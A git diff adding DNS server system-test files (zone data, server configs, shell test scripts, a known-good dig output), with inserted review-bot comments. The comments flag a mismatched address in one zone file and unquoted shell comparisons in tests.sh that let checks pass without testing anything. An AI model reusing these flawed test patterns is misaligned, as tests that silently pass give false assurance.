diff --git a/bin/tests/system/legacy/ns8/named.ednsformerr b/bin/tests/system/legacy/ns8/named.ednsformerr
new file mode 100644
index 0000000..e35cb02
--- /dev/null
+++ b/bin/tests/system/legacy/ns8/named.ednsformerr
@@ -0,0 +1 @@
+ednsformerr
diff --git a/bin/tests/system/legacy/ns9/ednsnotimp.db b/bin/tests/system/legacy/ns9/ednsnotimp.db
new file mode 100644
index 0000000..9aa3a4a
--- /dev/null
+++ b/bin/tests/system/legacy/ns9/ednsnotimp.db
@@ -0,0 +1,14 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+@ 60 SOA ns marka.isc.org. 1 0 0 0 0
+@ 60 NS ns
+ns 60 A 10.53.0.8
diff --git a/bin/tests/system/legacy/ns9/named.conf.in b/bin/tests/system/legacy/ns9/named.conf.in
new file mode 100644
index 0000000..385fbfd
--- /dev/null
+++ b/bin/tests/system/legacy/ns9/named.conf.in
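Review bot: ns9/ednsnotimp.db ends with `ns 60 A 10.53.0.8`, but ns9/named.conf.in in this commit binds the server for zone "ednsnotimp" to 10.53.0.9. The file has the same blob id (9aa3a4a) as ns8/ednsformerr.db, so it looks like a copy whose address was never adjusted; the record should probably read `ns 60 A 10.53.0.9`. The matching check in tests.sh expects the recursive lookup to fail, so a wrong address here could let that test pass for the wrong reason. This is worth confirming against the delegation served by ns1, which is outside this view.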
@@ -0,0 +1,29 @@
+/*
+ * Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+ *
+ * SPDX-License-Identifier: MPL-2.0
+ *
+ * This Source Code Form is subject to the terms of the Mozilla Public
+ * License, v. 2.0. If a copy of the MPL was not distributed with this
+ * file, you can obtain one at https://mozilla.org/MPL/2.0/.
+ *
+ * See the COPYRIGHT file distributed with this work for additional
+ * information regarding copyright ownership.
+ */
+
+options {
+ query-source address 10.53.0.9;
+ notify-source 10.53.0.9;
+ transfer-source 10.53.0.9;
+ port @PORT@;
+ pid-file "named.pid";
+ listen-on { 10.53.0.9; };
+ listen-on-v6 { none; };
+ recursion no;
+ dnssec-validation no;
+};
+
+zone "ednsnotimp" {
+ type primary;
+ file "ednsnotimp.db";
+};
diff --git a/bin/tests/system/legacy/ns9/named.ednsnotimp b/bin/tests/system/legacy/ns9/named.ednsnotimp
new file mode 100644
index 0000000..4e6424d
--- /dev/null
+++ b/bin/tests/system/legacy/ns9/named.ednsnotimp
@@ -0,0 +1 @@
+ednsnotimp
diff --git a/bin/tests/system/legacy/setup.sh b/bin/tests/system/legacy/setup.sh
new file mode 100644
index 0000000..2356d8f
--- /dev/null
+++ b/bin/tests/system/legacy/setup.sh
@@ -0,0 +1,26 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+copy_setports ns1/named1.conf.in ns1/named.conf
+copy_setports ns2/named.conf.in ns2/named.conf
+copy_setports ns3/named.conf.in ns3/named.conf
+copy_setports ns4/named.conf.in ns4/named.conf
+copy_setports ns5/named.conf.in ns5/named.conf
+copy_setports ns6/named.conf.in ns6/named.conf
+copy_setports ns7/named.conf.in ns7/named.conf
+copy_setports ns8/named.conf.in ns8/named.conf
+copy_setports ns9/named.conf.in ns9/named.conf
+copy_setports ns10/named.conf.in ns10/named.conf
diff --git a/bin/tests/system/legacy/tests.sh b/bin/tests/system/legacy/tests.sh
new file mode 100755
index 0000000..5e1622b
--- /dev/null
+++ b/bin/tests/system/legacy/tests.sh
@@ -0,0 +1,275 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="-p ${PORT} +tries=1 +time=2" + +# Check whether the SOA record for the name provided in $1 can be resolved by +# ns1. Return 0 if resolution succeeds as expected; return 1 otherwise. +resolution_succeeds() { + _ret=0 + $DIG $DIGOPTS +tcp +tries=3 +time=5 @10.53.0.1 ${1} SOA > dig.out.test$n || _ret=1 + grep "status: NOERROR" dig.out.test$n > /dev/null || _ret=1 + return $_ret +} + +# Check whether the SOA record for the name provided in $1 can be resolved by +# ns1. Return 0 if resolution fails as expected; return 1 otherwise. Note that +# both a SERVFAIL response and timing out mean resolution failed, so the exit +# code of dig does not influence the result (the exit code for a SERVFAIL +# response is 0 while the exit code for not getting a response at all is not 0). 
+resolution_fails() { + _servfail=0 + _timeout=0 + $DIG $DIGOPTS +tcp +time=5 @10.53.0.1 ${1} SOA > dig.out.test$n + grep "status: SERVFAIL" dig.out.test$n > /dev/null && _servfail=1 + grep "connection timed out" dig.out.test$n > /dev/null && _timeout=1 + if [ $_servfail -eq 1 ] || [ $_timeout -eq 1 ]; then + return 0 + else + return 1 + fi +} + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "checking formerr edns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.8 ednsformerr soa > dig.out.1.test$n || ret=1 +grep "status: FORMERR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noedns @10.53.0.8 ednsformerr soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to formerr edns server succeeds ($n)" +ret=0 +resolution_succeeds ednsformerr. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking notimp edns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.9 ednsnotimp soa > dig.out.1.test$n || ret=1 +grep "status: NOTIMP" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noedns @10.53.0.9 ednsnotimp soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to notimp edns server fails ($n)" +ret=0 +resolution_fails ednsnotimp. 
|| ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking refused edns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.10 ednsrefused soa > dig.out.1.test$n || ret=1 +grep "status: REFUSED" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noedns @10.53.0.10 ednsrefused soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to refused edns server fails ($n)" +ret=0 +resolution_fails ednsrefused. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking drop edns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.2 dropedns soa > dig.out.1.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noedns @10.53.0.2 dropedns soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +noedns +tcp @10.53.0.2 dropedns soa > dig.out.3.test$n || ret=1 +grep "status: NOERROR" dig.out.3.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.3.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.2 dropedns soa > dig.out.4.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to drop edns server fails ($n)" +ret=0 +resolution_fails dropedns. 
|| ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking drop edns + no tcp server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.3 dropedns-notcp soa > dig.out.1.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noedns +tcp @10.53.0.3 dropedns-notcp soa > dig.out.2.test$n && ret=1 +grep "connection refused" dig.out.2.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +noedns @10.53.0.3 dropedns-notcp soa > dig.out.3.test$n || ret=1 +grep "status: NOERROR" dig.out.3.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.3.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to drop edns + no tcp server fails ($n)" +ret=0 +resolution_fails dropedns-notcp. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking plain dns server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.4 plain soa > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.4 plain soa > dig.out.2.test$n +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to plain dns server succeeds ($n)" +ret=0 +resolution_succeeds plain. 
|| ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking plain dns + no tcp server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.5 plain-notcp soa > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null && ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.5 plain-notcp soa > dig.out.2.test$n +grep "connection refused" dig.out.2.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to plain dns + no tcp server succeeds ($n)" +ret=0 +resolution_succeeds plain-notcp. || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` +n=`expr $n + 1` + +echo_i "checking edns 512 server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.6 edns512 soa > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.6 edns512 soa > dig.out.2.test$n || ret=1 +grep "status: NOERROR" dig.out.2.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.2.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +dnssec @10.53.0.6 edns512 soa > dig.out.3.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.3.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +dnssec +bufsize=512 +ignore @10.53.0.6 edns512 soa > dig.out.4.test$n || ret=1 +grep "status: NOERROR" dig.out.4.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.4.test$n > /dev/null || ret=1 +grep "flags:.* tc[ ;]" dig.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to edns 512 server succeeds ($n)" +ret=0 +resolution_succeeds edns512. 
|| ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking edns 512 + no tcp server setup ($n)" +ret=0 +$DIG $DIGOPTS +edns @10.53.0.7 edns512-notcp soa > dig.out.1.test$n || ret=1 +grep "status: NOERROR" dig.out.1.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.1.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +tcp @10.53.0.7 edns512-notcp soa > dig.out.2.test$n && ret=1 +grep "connection refused" dig.out.2.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +dnssec @10.53.0.7 edns512-notcp soa > dig.out.3.test$n && ret=1 +grep "connection timed out; no servers could be reached" dig.out.3.test$n > /dev/null || ret=1 +$DIG $DIGOPTS +edns +dnssec +bufsize=512 +ignore @10.53.0.7 edns512-notcp soa > dig.out.4.test$n || ret=1 +grep "status: NOERROR" dig.out.4.test$n > /dev/null || ret=1 +grep "EDNS: version:" dig.out.4.test$n > /dev/null || ret=1 +grep "flags:.* tc[ ;]" dig.out.4.test$n > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to edns 512 + no tcp server fails ($n)" +ret=0 +resolution_fails edns512-notcp. 
|| ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking recursive lookup to edns 512 + no tcp server does not cause query loops ($n)" +ret=0 +sent=`grep -c -F "sending packet to 10.53.0.7" ns1/named.run` +if [ $sent -ge 10 ]; then + echo_i "ns1 sent $sent queries to ns7, expected less than 10" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "checking that TCP failures do not influence EDNS statistics in the ADB ($n)" +ret=0 +rndc_dumpdb ns1 -adb || ret=1 +timeouts512=`sed -n "s|.*10\.53\.0\.7.*\[edns \([0-9/][0-9/]*\).*|\1|p" ns1/named_dump.db.test$n | awk -F/ '{print $NF}'` +if [ $timeouts512 -ne 0 ]; then + echo_i "512-byte EDNS timeouts according to ADB: $timeouts512, expected: 0" + ret=1 +fi +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +stop_server --use-rndc --port ${CONTROLPORT} ns1 +copy_setports ns1/named2.conf.in ns1/named.conf +start_server --noclean --restart --port ${PORT} ns1 + +n=`expr $n + 1` +echo_i "checking recursive lookup to edns 512 + no tcp + trust anchor fails ($n)" +# retry loop in case the server restart above causes transient failure +for try in 0 1 2 3 4 5 6 7 8 9; do + ret=0 + resolution_fails edns512-notcp. || ret=1 + [ "$ret" -eq 0 ] && break + sleep 1 +done +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/limits/clean.sh b/bin/tests/system/limits/clean.sh new file mode 100644 index 0000000..b69c695 --- /dev/null +++ b/bin/tests/system/limits/clean.sh 
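Review bot: The ADB statistics check near the end of this hunk fails open: `if [ $timeouts512 -ne 0 ]` is unquoted, so when the `sed` expression matches no line in `ns1/named_dump.db.test$n` (or matches more than one) the `[` command exits with an error, the `if` body is skipped and `ret` stays 0, so the test passes without having checked anything. A string comparison fails closed in both cases, assuming the dump prints the counter as a plain `0`: `if [ "$timeouts512" != "0" ]; then`. The query-loop check just above has the same shape; `[ $sent -ge 10 ]` also errors when `grep -c` prints nothing (for instance if `ns1/named.run` cannot be read), and `if [ "${sent:-10}" -ge 10 ]; then` would treat a missing count as a failure. In the "plain dns server setup" block the `$DIG $DIGOPTS +edns +tcp @10.53.0.4 plain soa` call is the one expected-success query without `|| ret=1`, although the following grep for NOERROR largely covers it.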
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+#
+# Clean up after limits tests.
+#
+rm -f dig.out.*
+rm -f */named.memstats
+rm -f */named.conf
+rm -f */named.run
+rm -f ns*/named.lock
+rm -f ns*/managed-keys.bind*
diff --git a/bin/tests/system/limits/knowngood.dig.out.1000 b/bin/tests/system/limits/knowngood.dig.out.1000
new file mode 100644
index 0000000..3b7e01a
--- /dev/null
+++ b/bin/tests/system/limits/knowngood.dig.out.1000
@@ -0,0 +1,1023 @@ + +; <<>> DiG 8.2 <<>> 1000.example. @10.53.0.1 a -p +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr aa rd ad; QUERY: 1, ANSWER: 1000, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; 1000.example, type = A, class = IN + +;; ANSWER SECTION: +1000.example. 5M IN A 10.0.0.0 +1000.example. 5M IN A 10.0.0.1 +1000.example. 5M IN A 10.0.0.2 +1000.example. 5M IN A 10.0.0.3 +1000.example. 5M IN A 10.0.0.4 +1000.example. 5M IN A 10.0.0.5 +1000.example. 5M IN A 10.0.0.6 +1000.example. 5M IN A 10.0.0.7 +1000.example. 5M IN A 10.0.0.8 +1000.example. 5M IN A 10.0.0.9 +1000.example. 5M IN A 10.0.0.10 +1000.example. 5M IN A 10.0.0.11 +1000.example. 5M IN A 10.0.0.12 +1000.example. 5M IN A 10.0.0.13 +1000.example. 5M IN A 10.0.0.14 +1000.example. 5M IN A 10.0.0.15 +1000.example. 5M IN A 10.0.0.16 +1000.example. 5M IN A 10.0.0.17 +1000.example. 5M IN A 10.0.0.18 +1000.example. 5M IN A 10.0.0.19 +1000.example. 5M IN A 10.0.0.20 +1000.example. 5M IN A 10.0.0.21 +1000.example. 5M IN A 10.0.0.22 +1000.example. 5M IN A 10.0.0.23 +1000.example. 5M IN A 10.0.0.24 +1000.example. 5M IN A 10.0.0.25 +1000.example. 5M IN A 10.0.0.26 +1000.example. 5M IN A 10.0.0.27 +1000.example. 5M IN A 10.0.0.28 +1000.example. 5M IN A 10.0.0.29 +1000.example. 5M IN A 10.0.0.30 +1000.example. 5M IN A 10.0.0.31 +1000.example. 5M IN A 10.0.0.32 +1000.example. 5M IN A 10.0.0.33 +1000.example. 5M IN A 10.0.0.34 +1000.example. 5M IN A 10.0.0.35 +1000.example. 5M IN A 10.0.0.36 +1000.example. 5M IN A 10.0.0.37 +1000.example. 5M IN A 10.0.0.38 +1000.example. 5M IN A 10.0.0.39 +1000.example. 5M IN A 10.0.0.40 +1000.example. 5M IN A 10.0.0.41 +1000.example. 5M IN A 10.0.0.42 +1000.example. 5M IN A 10.0.0.43 +1000.example. 5M IN A 10.0.0.44 +1000.example. 5M IN A 10.0.0.45 +1000.example. 5M IN A 10.0.0.46 +1000.example. 5M IN A 10.0.0.47 +1000.example. 5M IN A 10.0.0.48 +1000.example. 
5M IN A 10.0.0.49 +1000.example. 5M IN A 10.0.0.50 +1000.example. 5M IN A 10.0.0.51 +1000.example. 5M IN A 10.0.0.52 +1000.example. 5M IN A 10.0.0.53 +1000.example. 5M IN A 10.0.0.54 +1000.example. 5M IN A 10.0.0.55 +1000.example. 5M IN A 10.0.0.56 +1000.example. 5M IN A 10.0.0.57 +1000.example. 5M IN A 10.0.0.58 +1000.example. 5M IN A 10.0.0.59 +1000.example. 5M IN A 10.0.0.60 +1000.example. 5M IN A 10.0.0.61 +1000.example. 5M IN A 10.0.0.62 +1000.example. 5M IN A 10.0.0.63 +1000.example. 5M IN A 10.0.0.64 +1000.example. 5M IN A 10.0.0.65 +1000.example. 5M IN A 10.0.0.66 +1000.example. 5M IN A 10.0.0.67 +1000.example. 5M IN A 10.0.0.68 +1000.example. 5M IN A 10.0.0.69 +1000.example. 5M IN A 10.0.0.70 +1000.example. 5M IN A 10.0.0.71 +1000.example. 5M IN A 10.0.0.72 +1000.example. 5M IN A 10.0.0.73 +1000.example. 5M IN A 10.0.0.74 +1000.example. 5M IN A 10.0.0.75 +1000.example. 5M IN A 10.0.0.76 +1000.example. 5M IN A 10.0.0.77 +1000.example. 5M IN A 10.0.0.78 +1000.example. 5M IN A 10.0.0.79 +1000.example. 5M IN A 10.0.0.80 +1000.example. 5M IN A 10.0.0.81 +1000.example. 5M IN A 10.0.0.82 +1000.example. 5M IN A 10.0.0.83 +1000.example. 5M IN A 10.0.0.84 +1000.example. 5M IN A 10.0.0.85 +1000.example. 5M IN A 10.0.0.86 +1000.example. 5M IN A 10.0.0.87 +1000.example. 5M IN A 10.0.0.88 +1000.example. 5M IN A 10.0.0.89 +1000.example. 5M IN A 10.0.0.90 +1000.example. 5M IN A 10.0.0.91 +1000.example. 5M IN A 10.0.0.92 +1000.example. 5M IN A 10.0.0.93 +1000.example. 5M IN A 10.0.0.94 +1000.example. 5M IN A 10.0.0.95 +1000.example. 5M IN A 10.0.0.96 +1000.example. 5M IN A 10.0.0.97 +1000.example. 5M IN A 10.0.0.98 +1000.example. 5M IN A 10.0.0.99 +1000.example. 5M IN A 10.0.0.100 +1000.example. 5M IN A 10.0.0.101 +1000.example. 5M IN A 10.0.0.102 +1000.example. 5M IN A 10.0.0.103 +1000.example. 5M IN A 10.0.0.104 +1000.example. 5M IN A 10.0.0.105 +1000.example. 5M IN A 10.0.0.106 +1000.example. 5M IN A 10.0.0.107 +1000.example. 5M IN A 10.0.0.108 +1000.example. 
5M IN A 10.0.0.109 +1000.example. 5M IN A 10.0.0.110 +1000.example. 5M IN A 10.0.0.111 +1000.example. 5M IN A 10.0.0.112 +1000.example. 5M IN A 10.0.0.113 +1000.example. 5M IN A 10.0.0.114 +1000.example. 5M IN A 10.0.0.115 +1000.example. 5M IN A 10.0.0.116 +1000.example. 5M IN A 10.0.0.117 +1000.example. 5M IN A 10.0.0.118 +1000.example. 5M IN A 10.0.0.119 +1000.example. 5M IN A 10.0.0.120 +1000.example. 5M IN A 10.0.0.121 +1000.example. 5M IN A 10.0.0.122 +1000.example. 5M IN A 10.0.0.123 +1000.example. 5M IN A 10.0.0.124 +1000.example. 5M IN A 10.0.0.125 +1000.example. 5M IN A 10.0.0.126 +1000.example. 5M IN A 10.0.0.127 +1000.example. 5M IN A 10.0.0.128 +1000.example. 5M IN A 10.0.0.129 +1000.example. 5M IN A 10.0.0.130 +1000.example. 5M IN A 10.0.0.131 +1000.example. 5M IN A 10.0.0.132 +1000.example. 5M IN A 10.0.0.133 +1000.example. 5M IN A 10.0.0.134 +1000.example. 5M IN A 10.0.0.135 +1000.example. 5M IN A 10.0.0.136 +1000.example. 5M IN A 10.0.0.137 +1000.example. 5M IN A 10.0.0.138 +1000.example. 5M IN A 10.0.0.139 +1000.example. 5M IN A 10.0.0.140 +1000.example. 5M IN A 10.0.0.141 +1000.example. 5M IN A 10.0.0.142 +1000.example. 5M IN A 10.0.0.143 +1000.example. 5M IN A 10.0.0.144 +1000.example. 5M IN A 10.0.0.145 +1000.example. 5M IN A 10.0.0.146 +1000.example. 5M IN A 10.0.0.147 +1000.example. 5M IN A 10.0.0.148 +1000.example. 5M IN A 10.0.0.149 +1000.example. 5M IN A 10.0.0.150 +1000.example. 5M IN A 10.0.0.151 +1000.example. 5M IN A 10.0.0.152 +1000.example. 5M IN A 10.0.0.153 +1000.example. 5M IN A 10.0.0.154 +1000.example. 5M IN A 10.0.0.155 +1000.example. 5M IN A 10.0.0.156 +1000.example. 5M IN A 10.0.0.157 +1000.example. 5M IN A 10.0.0.158 +1000.example. 5M IN A 10.0.0.159 +1000.example. 5M IN A 10.0.0.160 +1000.example. 5M IN A 10.0.0.161 +1000.example. 5M IN A 10.0.0.162 +1000.example. 5M IN A 10.0.0.163 +1000.example. 5M IN A 10.0.0.164 +1000.example. 5M IN A 10.0.0.165 +1000.example. 5M IN A 10.0.0.166 +1000.example. 
5M IN A 10.0.0.167 +1000.example. 5M IN A 10.0.0.168 +1000.example. 5M IN A 10.0.0.169 +1000.example. 5M IN A 10.0.0.170 +1000.example. 5M IN A 10.0.0.171 +1000.example. 5M IN A 10.0.0.172 +1000.example. 5M IN A 10.0.0.173 +1000.example. 5M IN A 10.0.0.174 +1000.example. 5M IN A 10.0.0.175 +1000.example. 5M IN A 10.0.0.176 +1000.example. 5M IN A 10.0.0.177 +1000.example. 5M IN A 10.0.0.178 +1000.example. 5M IN A 10.0.0.179 +1000.example. 5M IN A 10.0.0.180 +1000.example. 5M IN A 10.0.0.181 +1000.example. 5M IN A 10.0.0.182 +1000.example. 5M IN A 10.0.0.183 +1000.example. 5M IN A 10.0.0.184 +1000.example. 5M IN A 10.0.0.185 +1000.example. 5M IN A 10.0.0.186 +1000.example. 5M IN A 10.0.0.187 +1000.example. 5M IN A 10.0.0.188 +1000.example. 5M IN A 10.0.0.189 +1000.example. 5M IN A 10.0.0.190 +1000.example. 5M IN A 10.0.0.191 +1000.example. 5M IN A 10.0.0.192 +1000.example. 5M IN A 10.0.0.193 +1000.example. 5M IN A 10.0.0.194 +1000.example. 5M IN A 10.0.0.195 +1000.example. 5M IN A 10.0.0.196 +1000.example. 5M IN A 10.0.0.197 +1000.example. 5M IN A 10.0.0.198 +1000.example. 5M IN A 10.0.0.199 +1000.example. 5M IN A 10.0.0.200 +1000.example. 5M IN A 10.0.0.201 +1000.example. 5M IN A 10.0.0.202 +1000.example. 5M IN A 10.0.0.203 +1000.example. 5M IN A 10.0.0.204 +1000.example. 5M IN A 10.0.0.205 +1000.example. 5M IN A 10.0.0.206 +1000.example. 5M IN A 10.0.0.207 +1000.example. 5M IN A 10.0.0.208 +1000.example. 5M IN A 10.0.0.209 +1000.example. 5M IN A 10.0.0.210 +1000.example. 5M IN A 10.0.0.211 +1000.example. 5M IN A 10.0.0.212 +1000.example. 5M IN A 10.0.0.213 +1000.example. 5M IN A 10.0.0.214 +1000.example. 5M IN A 10.0.0.215 +1000.example. 5M IN A 10.0.0.216 +1000.example. 5M IN A 10.0.0.217 +1000.example. 5M IN A 10.0.0.218 +1000.example. 5M IN A 10.0.0.219 +1000.example. 5M IN A 10.0.0.220 +1000.example. 5M IN A 10.0.0.221 +1000.example. 5M IN A 10.0.0.222 +1000.example. 5M IN A 10.0.0.223 +1000.example. 5M IN A 10.0.0.224 +1000.example. 
5M IN A 10.0.0.225 +1000.example. 5M IN A 10.0.0.226 +1000.example. 5M IN A 10.0.0.227 +1000.example. 5M IN A 10.0.0.228 +1000.example. 5M IN A 10.0.0.229 +1000.example. 5M IN A 10.0.0.230 +1000.example. 5M IN A 10.0.0.231 +1000.example. 5M IN A 10.0.0.232 +1000.example. 5M IN A 10.0.0.233 +1000.example. 5M IN A 10.0.0.234 +1000.example. 5M IN A 10.0.0.235 +1000.example. 5M IN A 10.0.0.236 +1000.example. 5M IN A 10.0.0.237 +1000.example. 5M IN A 10.0.0.238 +1000.example. 5M IN A 10.0.0.239 +1000.example. 5M IN A 10.0.0.240 +1000.example. 5M IN A 10.0.0.241 +1000.example. 5M IN A 10.0.0.242 +1000.example. 5M IN A 10.0.0.243 +1000.example. 5M IN A 10.0.0.244 +1000.example. 5M IN A 10.0.0.245 +1000.example. 5M IN A 10.0.0.246 +1000.example. 5M IN A 10.0.0.247 +1000.example. 5M IN A 10.0.0.248 +1000.example. 5M IN A 10.0.0.249 +1000.example. 5M IN A 10.0.0.250 +1000.example. 5M IN A 10.0.0.251 +1000.example. 5M IN A 10.0.0.252 +1000.example. 5M IN A 10.0.0.253 +1000.example. 5M IN A 10.0.0.254 +1000.example. 5M IN A 10.0.0.255 +1000.example. 5M IN A 10.0.1.0 +1000.example. 5M IN A 10.0.1.1 +1000.example. 5M IN A 10.0.1.2 +1000.example. 5M IN A 10.0.1.3 +1000.example. 5M IN A 10.0.1.4 +1000.example. 5M IN A 10.0.1.5 +1000.example. 5M IN A 10.0.1.6 +1000.example. 5M IN A 10.0.1.7 +1000.example. 5M IN A 10.0.1.8 +1000.example. 5M IN A 10.0.1.9 +1000.example. 5M IN A 10.0.1.10 +1000.example. 5M IN A 10.0.1.11 +1000.example. 5M IN A 10.0.1.12 +1000.example. 5M IN A 10.0.1.13 +1000.example. 5M IN A 10.0.1.14 +1000.example. 5M IN A 10.0.1.15 +1000.example. 5M IN A 10.0.1.16 